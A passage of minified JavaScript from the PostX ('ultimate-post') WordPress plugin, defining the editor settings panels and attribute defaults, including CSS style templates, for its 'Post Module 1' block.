2,l.ID),(0===c||ne)&&ae&&(0,o.createElement)(u.Z,{readMoreText:ie,readMoreIcon:z,titleLabel:l.title,onClick:()=>{Ze("read-more"),Oe("read-more")}}),r(1,l.ID),(0===c||V)&&q&&"bottom"==ce&&(0,o.createElement)(p.Z,{meta:m,post:l,metaSeparator:K,metaStyle:G,metaMinText:he,metaAuthorPrefix:fe,metaDateFormat:we,authorLink:xe,onClick:e=>{Ze("meta"),Oe("meta")}}),r(0,l.ID),(0,b.o6)()&&Ce&&(0,o.createElement)(v.Z,{dcFields:Ee,setAttributes:A,startOnboarding:je})))))})),(0,o.createElement)("div",{className:"ultp-big-post-module1"},t),(0,o.createElement)("div",{className:"ultp-small-post-module1"},a)):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:_e})}(),Be&&"navigation"==Ue&&"topRight"!=Me&&(0,o.createElement)(c.Z,{onClick:()=>{Ze("pagination"),Oe("pagination")}}))))}},76778:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=9,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,settingTab:v,setSettingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6825",store:t}),(0,o.createElement)(p.Sections,{settingTab:v,setSettingTab:h},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:b.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns"],include:[{position:0,data:{type:"layout",block:"post-module-1",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pm1/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pm1/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pm1/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pm1/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pm1/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]}},{position:3,data:{type:"range",key:"largeHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Large Image Height","ultimate-post")}},{position:7,data:{type:"toggle",key:"columnFlip",label:__("Flip Layout","ultimate-post"),pro:!0}},{position:12,data:{type:"tag",key:"varticalAlign",label:__("Small Vertical Align","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"middle",label:__("Middle","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,exclude:["titleBackground"],include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}},{data:{type:"dimension",key:"titleLgPadding",label:__("Padding Large Item","ultimate-post"),step:1,unit:!0,responsive:!0}}],hrIdx:[4,9]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,depend:"showImage",exclude:["imgMargin"],include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:4,data:{type:"range",key:"lgImgSpacing",label:__("Large Image Spacing ( Y )","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,initialOpen:b.meta,depend:"metaShow",exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],hrIdx:[{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",exclude:["catPosition"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],store:t,hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,initialOpen:b.excerpt,depend:"excerptShow",include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],store:t,hrIdx:[4,7]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore",include:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),("layout4"===l||"layout5"===l)&&(0,o.createElement)(a.wT,{store:t}),(0,o.createElement)(a.Yp,{depend:"separatorShow",store:t}),(0,o.createElement)(a.O2,{store:t,exclude:["contenWraptWidth","contenWraptHeight"]}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow",hrIdx:[{tab:"settings",hr:[{idx:1,label:__("Heading Settings","ultimate-posts")},{idx:8,label:__("Subheading Settings","ultimate-posts")}]},{tab:"style",hr:[{idx:1,label:__("Heading Style","ultimate-posts")},{idx:12,label:__("Subheading Style","ultimate-posts")}]}]}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",exclude:["filterType","filterValue"],include:[{position:2,data:a.YA},{position:3,data:a.sx}],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,store:t,initialOpen:b.pagination,depend:"paginationShow",include:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition","pagiMargin"],hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c,h&&s];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}],exSettings:["filterType","filterValue"],exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiPadding","navMargin"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exStyle:["pagiTypo","pagiMargin","pagiPadding","navMargin"],exSettings:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({include:[{position:7,data:{type:"dimension",key:"titleLgPadding",label:__("Padding Large Item","ultimate-post"),step:1,unit:!0,responsive:!0}}],exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaMargin","metaPadding","metaSpacing"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}],exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],exSettings:["catPosition"],exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:4,data:{type:"range",key:"lgImgSpacing",label:__("Large Image Spacing ( Y )","ultimate-post"),min:0,max:100,step:1,responsive:!0}}],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exStyle:["imgMargin"]}));default:return null}}},21910:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},columnGridGap:{type:"object",default:{lg:"15",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-post-module1 { margin: 0 -{{columnGridGap}}; } \n          {{ULTP}} .ultp-block-post-module1 .ultp-big-post-module1, \n          {{ULTP}} .ultp-block-post-module1 .ultp-small-post-module1 { padding: 0 {{columnGridGap}};} \n          {{ULTP}} .ultp-block-row {grid-column-gap: {{columnGridGap}}; }"}]},largeHeight:{type:"object",default:{lg:"245",unit:"px"},style:[{selector:"{{ULTP}} .ultp-big-post-module1 .ultp-block-content-wrap .ultp-block-image img {width: 100%; object-fit: cover; height: {{largeHeight}};}"}]},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module1 .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-big-post-module1 .ultp-block-item:first-child .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"22",unit:"px"},transform:"",decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-item .ultp-block-title, \n          {{ULTP}} .ultp-small-post-module1 .ultp-block-item .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:0,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLgPadding:{type:"object",default:{lg:{top:10,bottom:8,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-big-post-module1 .ultp-block-title { padding:{{titleLgPadding}}; }"}]},titleLength:{type:"string",default:0},varticalAlign:{type:"string",default:"middle",style:[{depends:[{key:"varticalAlign",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-block-content-top .ultp-block-content { -ms-flex-item-align: flex-start;-ms-grid-row-align: flex-start;align-self: flex-start; }"},{depends:[{key:"varticalAlign",condition:"==",value:"middle"}],selector:"{{ULTP}} .ultp-block-content-middle .ultp-block-content { -ms-flex-item-align: center;-ms-grid-row-align: center;align-self: center; }"},{depends:[{key:"varticalAlign",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-block-content-bottom .ultp-block-content { -ms-flex-item-align: flex-end;-ms-grid-row-align: flex-end;align-self: flex-end; }"}]},imgCrop:{type:"string",default:"full",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"layout",condition:"!=",value:"layout1"},{key:"showImage",condition:"==",value:!0}]}]},imgWidth:{type:"object",default:{lg:"80",sm:"65",xs:"",ulg:"px",usm:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-image img {height: {{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-image img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image, \n        {{ULTP}} .ultp-block-image img, \n        {{ULTP}} .ultp-block-image.ultp-block-image-overlay > a:before, \n        {{ULTP}} .ultp-block-image.ultp-block-image-overlay > a:after { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img, \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image, \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image.ultp-block-image-overlay > a:before, \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image.ultp-block-image-overlay > a:after { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"20"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout2"},{key:"layout",condition:"!=",value:"layout1"}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-image { margin-right: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-small-post-module1 .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-small-post-module1 .ultp-block-image { margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-small-post-module1 .ultp-block-image { margin-left: 0; margin-right: {{imgSpacing}}px; }"}]},lgImgSpacing:{type:"object",default:{lg:"0"},style:[{selector:"{{ULTP}} .ultp-big-post-module1 .ultp-block-image { margin-bottom:{{lgImgSpacing}}px; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; 